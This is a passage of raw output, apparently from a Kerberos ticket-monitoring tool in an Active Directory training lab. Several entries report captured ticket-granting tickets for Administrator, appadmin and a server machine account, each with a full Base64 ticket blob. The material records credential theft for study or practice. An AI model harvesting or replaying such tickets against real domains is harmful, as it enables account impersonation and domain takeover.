NMT4U48n1bf5obxbzuz3VJIkkI9rUaqjIU6DzhnG9PCsHYsHoUZegbajEhbmlYxMq7CxQGIXZd7A1pMNRdRfiHUPPRSOnLdWeZl8R6Afq/2xto2KFEcBVCO81Y06FuQDqgHyyyBirSszGnMo7QkknbvLAKJjJDV+vub/gdIlks+nJYIxf5itYNDdPVbnMilP6ruiVpKE8em5j3+mPmdgwn+mb2N/fKB4rwFu1Pq6C2pbgG6Hu1ATuPF22Xf8A/HysRmgceuLcERGMjKkfZQ1dCVRoJcydbbkSDk2FoFCl86OJ8Ccn1sJ4LyRGIlz5fR/U+yXV8YrXA7w8U/vfEyC2jnPowETDGo4IBGjCCARagAwIBAKKCAQ0EggEJfYIBBTCCAQGggf4wgfswgfigKzApoAMCARKhIgQg/rb5+fRTzoVjuW+WANtTBAW3DywIctUficFJSroi7j+hHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBgoQAApREYDzIwMjQwMzAyMjM1MjEyWqYRGA8yMDI0MDMwMzA5NTIxMlqnERgPMjAyNDAzMDkyMzUyMTJaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:51:13 PM
EndTime : 3/3/2024 1:51:12 AM
RenewTill : 3/9/2024 3:51:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:50:12 PM
EndTime : 3/3/2024 1:50:12 AM
RenewTill : 3/9/2024 3:50:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : appadmin@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:50:00 PM
EndTime : 3/3/2024 1:48:49 AM
RenewTill : 3/9/2024 3:48:49 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIF+jCCBfagAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBG0wggRpoAMCARKhAwIBAqKCBFsEggRXIqol9HxN4RD0RBgkBJ49xS1us4xvyGv53oPCbGwW2bW6almLNOo7zduPd9FQlHwpg+Uz17mMNvXS5Gy0LrMyrLYFTVhdi5di58fu6KOCL/balDzpNccFotgEPwk5Hbu9loNlmBEe37rAOIsKv37iq0EVQNE4xhAhweUmgyJWRTIgWysSGN4uUrCGPNARinntL5ezOD/lGX6/EvyVW8B7jc0lJHG6s4ZaNmNR4DHP5LDQXbVKOxsbMy/ThD8NcfvTXNgdW93ItxbkW6zWFo/xSzolFNP15oc/9iYNpAWeqDDqVwrZodD6J4oMTH38ODYs1c7VN0juIPYGldK/IKHH+BNLbZvdaYgzGDU0pgvqfCb9rTre2rmJjj43/HDj9yO27IzF5Ah3MM5PgyXvvOs9gI4kDHVYIfTy1vnrSnosB2eAs0AjdeRLlPblNelrRwPy8vswNRzzr3JQH2eWX14+KBr/uKLkaxKiHcNIofaN6+C+yn0Z/yrasOMXV7LFBsEU0XDd0mhAE95WQix5WBQu5GRZeAKzIcZu2j0EIILRhVnoIqoxEMtBOF+JtMFDhe7rmwAnhR8JsgHeZ0OkSYZTRn7UNvfoZ+OaYaDxz33iSNrTc/tD63WKcuSyu9BqAv87JIzPSWOXl0ri4L2JLociQsChBx7l5qhn72A54/23Z9iPL3ajNlCdQiBzYUrR0pt45kl5UDWzyyWAZhd6ZQd+zqI68YtvQQFGsmWhqI6hMpgQ5HQZav3hfry0lhjZyD+qSl27C+pUQuFwBhEjXOV3gymGSrtb3RDsXaEre1wGVlV4T2w45AQv3he6auqwEdnAX+rcl9geuMpGpPhR5IKEURCAGCf5dwc4d38xxaXuqoUjAW+D4tmmDzkKWt8xrPfO8PV1VhJIL3UP0ZOA7Mj6xATut5riWoifhSF0kYiFRJllNAAuMeTTovmAgfQiFW5Qh/A+vYLCY0LVlfz+V6BhOmnkZnxvi5LWPx0QxNglIRe8AxHFVKsZ7xQOfWpBm45sZId/7yxOtalASYc2OqKgUwWbK0oN414nRNcBQTgxc+gwqV5fItb8Nq/xKUS5ZiHTqAqBdOenwVAAX5psr4SEf3ZVkbZoR7FDUOTxuntjl7Zmik3KfiCX9aT8k0JlvcPC1MgF8YBHk7P4Lx8G44wEIb/6/XjlbwWTyM33SxSPWPUueJpYN2R0nSdaxofCZrGHHUwExu2l37Vpb3OoYHBrvHTmeutTJuVvhZR8jtaW0wCFxPU6eh86dWPIfAKYZgG7IOl0ajnfKG2oWhRWE/ovlMNPZW9CDl7UHif4ASxPt4rXsP148ikRfWQC25JZNb9tizaC0brDj9lD9XbJwnr82AlTS2dZpuggtrsWZJcZTvHMHKwPlu04ki+u+ScWOgtCnv9XACeUCGGYUlLXg1gnVh+LnZLJ/mdHev2Jq2dIkJyl8dozoXZL2hrgyjsRn2UG37VaUIJbFaOCARMwggEPoAMCAQCiggEGBIIBAn2B/zCB/KCB+TCB9jCB86ArMCmgAwIBEqEiBCDHLdsjEF5doj4OM7aIcI/hn8KaeeNx1gGM4ryN6Y39YKEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIVMBOgAwIBAaEMMAobCGFwcGFkbWluowcDBQBgoQAApREYDzIwMjQwMzAyMjM1MDAwWqYRGA8yMDI0MDMwMzA5NDg0OVqnERgPMjAyNDAzMDkyMzQ4NDlaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:48:12 PM
EndTime : 3/3/2024 1:48:12 AM
RenewTill : 3/9/2024 3:48:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:25:12 PM
EndTime : 3/3/2024 1:25:12 AM
RenewTill : 3/9/2024 3:25:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : DCORP-APPSRV$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:10:28 PM
EndTime : 3/3/2024 1:10:28 AM
RenewTill : 3/9/2024 5:35:48 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:57:12 PM
EndTime : 3/3/2024 1:57:12 AM
RenewTill : 3/9/2024 3:57:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBNIwggTOoAMCARKhAwIBAqKCBMAEggS8TaKk5WZqbl3Zb6MoOlu3rDD5HLLFQJ7xumueMc1pz68VsYwEIw8IiwSnqAfGFFLbGhbbExHHLA3X5BPEjdUhJjsWU4cWdJ0RfRaBa84gDHNpln5R65wH/ParK7doYcMb7RHqEtA18vYLR8/yeyRzKZc6QFQrCGOUFcnAj2ZfX1jwLdrpHjzRBpf+je0k4aMTTCyqSmq7BVUPApyWvqI9kMVJr9sxQoqdbbTax0kbk8HPSHjmz6M1Z3Iv97cyGcaW0C3M+6nFK94x5/puXI8WZGFX015POAaWj2jreeeVT+b3ohYkjakhdceeE8cvrk0XrhzSLj+71q/1UMkOYTPoDoEMXMMtBJbXHmoAKzJ4EzB30PwhTvrJzoZnJtYQhRbSUHx/h6GF35GVtuvloKewCYPVmTTBfI1w63ug0+X/RXYiP/BNteBt9aIu41WBXd6EibdFEKLJoxpThbfXqv8HHdj6GYcIYiVWUt+BbIZONNeBZS0dVDT2gLeTuMrg6v0giNPi5iyWmv7M7OvG5bVrXWy33D5X0xP0lNPek01V1N3kMMrIZyh5IBhqVNhnYgdmMgq